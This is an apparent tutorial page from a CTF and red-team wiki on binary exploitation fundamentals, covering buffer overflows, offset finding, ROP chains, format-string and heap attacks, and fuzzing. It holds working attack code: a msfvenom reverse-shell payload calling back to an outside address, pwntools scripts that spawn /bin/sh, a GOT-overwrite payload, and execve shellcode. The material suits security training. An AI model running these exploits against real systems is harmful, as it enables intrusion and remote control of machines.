Edit

Exploit Development Fundamentals

Exploit Development Fundamentals — Mastering the Art of Binary Exploitation

Exploit development transforms a vulnerability into total control. In CTFs and red-team operations, this skill separates script-kiddie from operator. This section will walk you through the foundations of exploit crafting, from buffer overflows and memory corruption to shellcode injection and return-oriented programming (ROP).

I. 🧩 Core Concepts

Concept
Description

Vulnerability

A software flaw that lets you influence execution.

Exploit

Code or payload that triggers the vulnerability to gain control.

Buffer Overflow

Overwriting adjacent memory on the stack.

EIP/RIP Control

Overwriting instruction pointer to hijack execution flow.

Shellcode

Machine-code payload executed after control is gained.

ROP Chain

Linking small code gadgets to bypass protections (NX/DEP).

II. ⚙️ The Exploit Development Mindset

1️⃣ Identify the flaw → crash, fuzz, or analyze. 2️⃣ Reproduce → control the crash reliably. 3️⃣ Find control → overwrite registers (EIP/RIP). 4️⃣ Redirect execution → jump to shellcode or gadgets. 5️⃣ Bypass protections → ASLR, NX, PIE, Stack Canary. 6️⃣ Deliver payload → reverse shell, privilege escalation, persistence.

III. 🧠 Setting Up Your Exploit Lab

🧩 Tools

sudo apt install gdb gdb-multiarch pwntools peda nasm libc6-dbg
pip install pwntools ropper ROPgadget

🧠 Recommended Environment

Tool
Purpose

GDB + PEDA / GEF / pwndbg

Interactive debugging

Pwntools

Exploit scripting framework

ROPgadget / Ropper

Gadget discovery

Radare2 / Cutter

Binary analysis

Ghidra / IDA Free

Decompilation

Immunity Debugger

Windows binary analysis

IV. 💣 Understanding Buffer Overflows

🧩 Example: Vulnerable Code

#include <stdio.h>
#include <string.h>
int main() {
    char buf[64];
    gets(buf);
    printf("You entered: %s\n", buf);
    return 0;
}

When you input more than 64 bytes, you overwrite the return address → control execution flow.

🧠 Finding the Offset

1. Generate a unique pattern

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

2. Crash and capture EIP

In GDB:

gdb ./vuln
run <pattern>
info registers

3. Find offset

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP>

V. 🧩 Gaining Control

Once you know the offset:

python3 -c "print('A'*offset + 'B'*4)" | ./vuln

If EIP = 0x42424242 (BBBB), you control execution.

VI. 🧠 Injecting Shellcode

🧩 Generate shellcode

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f python -b "\x00"

💣 Inject into payload

payload = b"A"*offset + eip + nop_sled + shellcode

⚙️ Example Payload (Pwntools)

from pwn import *
p = process('./vuln')
payload = b"A"*72 + p64(0xdeadbeef)
p.sendline(payload)
p.interactive()

VII. 🧩 Bypassing Protections

Protection
Bypass Technique

NX / DEP

Use ROP to execute system calls

ASLR

Leak addresses (format string / info leak)

Stack Canary

Leak or brute-force canary

PIE

Leak binary base and rebase addresses

RELRO

Partial → overwrite GOT entries; Full → use ROP

🧠 Disable Protections for Practice

gcc vuln.c -o vuln -fno-stack-protector -z execstack -no-pie

VIII. ⚙️ Return-Oriented Programming (ROP)

🧩 Basic Idea

Use existing instructions ending in ret to perform logic when the stack is non-executable.

🧠 Finding Gadgets

ROPgadget --binary vuln | grep "pop rdi"

⚙️ Example: Call system("/bin/sh")

from pwn import *
elf = context.binary = ELF('./vuln')
rop = ROP(elf)
rop.call('system', [next(elf.search(b"/bin/sh"))])
payload = b"A"*offset + rop.chain()
p = process(elf.path)
p.sendline(payload)
p.interactive()

IX. 🧬 Format String Exploits

🧠 Identify

printf(user_input);

💣 Leak Memory

./vuln <<< "%p %p %p %p"

⚙️ Overwrite GOT Entry

Use %n specifier to write arbitrary data to memory. Pwntools makes this easy:

payload = fmtstr_payload(offset, {elf.got['printf']: elf.symbols['system']})

X. 🧩 Heap Exploitation Basics

Technique
Description

Use-After-Free (UAF)

Accessing memory after freeing it.

Heap Overflow

Overwriting heap metadata to control allocations.

Double Free

Freeing memory twice to control freelist.

House of Force / Spirit

Classic heap manipulation strategies.

Tools:

sudo apt install heaptrack libc6-dbg

Use GDB plugin heap-viewer for visualization.

XI. ⚙️ Fuzzing & Crash Discovery

🧠 Basic Fuzz Script

from pwn import *
for i in range(100,2000,100):
    p = process('./vuln')
    p.sendline(b"A"*i)
    p.wait()
    p.close()

🧩 Fuzzing Frameworks

Tool
Description

AFL++

Coverage-guided fuzzer

libFuzzer

LLVM integrated fuzzing

boofuzz

Network protocol fuzzing

XII. 🧠 Debugging Workflows

🧩 GDB Essentials

gdb ./vuln
break main
run
info registers
x/32x $esp
pattern create 200
pattern offset EIP

🧠 GDB Plugins

Plugin
Command
Feature

pwndbg

context

Memory + register visualization

GEF

heap, ropper

Heap and gadget utilities

PEDA

checksec, pattern

Binary protections and pattern tools

XIII. ⚙️ Shellcode Engineering

🧩 Writing Custom Shellcode (x86 Linux)

section .text
global _start
_start:
    xor eax, eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    mov al, 0xb
    xor ecx, ecx
    xor edx, edx
    int 0x80

Assemble:

nasm -f elf32 shell.asm -o shell.o
ld -o shell shell.o
objdump -d shell | grep '[0-9a-f]:' | cut -f2 | tr -d '\n' | sed 's/ //g'

XIV. 🧩 Exploit Template (Pwntools)

from pwn import *
context(arch='amd64', os='linux')
elf = ELF('./vuln')
rop = ROP(elf)
offset = 72
payload = flat({offset: rop.ret.address}) + p64(elf.symbols['win'])
p = process(elf.path)
p.sendline(payload)
p.interactive()

XV. 🧠 Practice Targets

Platform
Challenge Type

pwnable.kr

Beginner-to-intermediate binaries

exploit.education

Protostar, Fusion, Nebula

HackTheBox

Binary exploitation boxes

CTFtime.org

Track live exploit challenges

ROP Emporium

ROP-focused binaries

XVI. ⚔️ Real-World Workflow Example

# 1. Analyze binary
checksec --file=./vuln

# 2. Find offset
pattern_create.rb -l 200
pattern_offset.rb -q 0x61616164

# 3. Craft exploit
python3 exploit.py

# 4. Test local
./vuln < payload

# 5. Deploy remote
python3 exploit.py REMOTE

XVII. 🧩 Pro Tips & Red Team Tricks

Scripting Discipline

  • Always build modular exploit templates.

  • Automate testing offsets, payloads, and bad chars.

Memory Hygiene

  • Use valgrind or asan to spot hidden corruption early.

ROP Gadget Optimization

  • Combine gadgets to reduce chain size (less noise).

Local-to-Remote Translation

  • Always sync binary versions and libc.

  • Use p.recvuntil() for timing adjustments.

Reporting

  • Document EIP/RIP control, offsets, bypasses, and payload outcomes.

XVIII. ⚙️ Quick Reference Table

Topic
Command / Tool
Description

Offset

pattern_create / pattern_offset

Identify buffer offset

Debug

GDB + pwndbg

Inspect crash & registers

Shellcode

msfvenom

Generate payloads

ROP

ROPgadget, pwntools

Build chains

Protection Check

checksec

View binary security features

Fuzzing

Pwntools / AFL++

Crash discovery

Exploit Framework

Pwntools

Automate everything

PreviousPWNNextAdvanced ROP & Shellcode Techniques

Last updated

Was this helpful?